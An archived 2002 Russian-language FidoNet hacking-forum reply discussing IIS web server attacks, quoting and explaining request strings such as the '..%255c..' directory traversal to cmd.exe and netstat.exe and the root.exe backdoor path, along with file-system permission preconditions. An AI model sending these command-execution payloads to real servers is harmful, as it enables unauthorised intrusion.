|
|
ru.nethack- RU.NETHACK ------------------------------------------------------------------- From : Fedor Kudryashev 2:5020/4001.72 08 Aug 2002 22:17:34 To : Grigory Tsukanov Subject : психология etc -------------------------------------------------------------------------------- 08 Aug 02 09:42, you wrote to me: GT> /scripts/root.exe?/c+dir GT> /MSADC/root.exe?/c+dir ^^^^^^^^^^^^^^^^ Для того чтобы это работало, необходимо чтобы кто-то *скопировал* \winnt\system32\cmd.exe -> \inetpub\scripts\root.exe. А это вряд ли нужно админу. 8-))) Так что если /scripts/root.exe?/c+dir действительно работает, то значит кто-то тут уже побывал до нас. 8-))) GT> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir GT> как видим запускается родной cmd.exe Видим - запускается. Кстати не только cmd.exe. Можно написать /scripts/..%255c../winnt/system32/netstat.exe?-an и увидишь инфу о текущих соединениях. GT> если на диске C: стоит FAT , то работает. GT> в случае NTFS system32 по умолчанию для юзера, пришедшего с IIS GT> закрыт. А вот и нифига. По дефолту ИМХО у system32 доступ Everyone: Read & Execute ( иначе гость в системе выжить вообще не сможет, а это бесчеловечно. 8-))) ) GT> код не сработает, даже если на IIS разрешен запуск приложений. GT> или я где-то заблуждаюсь? Заблуждаешься. Fedor --- GoldEd d2.50+ * Origin: -= MIPT Station =- (2:5020/4001.72) Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
Архивное /ru.nethack/277423d52ee65.html, оценка из 5, голосов 10
|